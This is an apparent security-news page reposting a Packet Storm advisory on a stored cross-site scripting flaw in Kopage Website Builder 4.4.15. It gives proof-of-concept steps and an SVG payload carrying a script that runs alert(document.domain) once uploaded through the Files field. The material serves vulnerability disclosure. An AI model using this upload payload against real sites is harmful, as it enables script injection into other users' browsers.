Security
Headlines
HeadlinesLatestCVEs

Headline

Kopage Website Builder 4.4.15 Cross Site Scripting

Kopage Website Builder version 4.4.15 suffers from a persistent cross site scripting vulnerability.

Packet Storm
Open in Source
#xss#vulnerability#web#php#auth
#Exploit Title: Kopage Website Builder version 4.4.15 – Stored Cross-Site Scripting (XSS)#Date: 1/12/2023#Exploit Author: tmrswrr#Vendor Homepage: https://www.kopage.com/#Version: Version : 4.4.15#Tested on: https://demo.kopage.com/index.php#Poc:1 ) Install the system through the website and log in with any user.2 ) Go to Files field and click upload 3 ) Upload your svg filePayload :<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 500 500">    <script>//<![CDATA[        alert(document.domain)    //]]>    </script></svg>4 ) Open svg file url you will be see alert button.Url : https://demo.kopage.com/demo/9ff16a191981a3f2ee0a7cca7/data/files/aaa.svg

Packet Storm: Latest News

Ubuntu Security Notice USN-7089-6
Packet Storm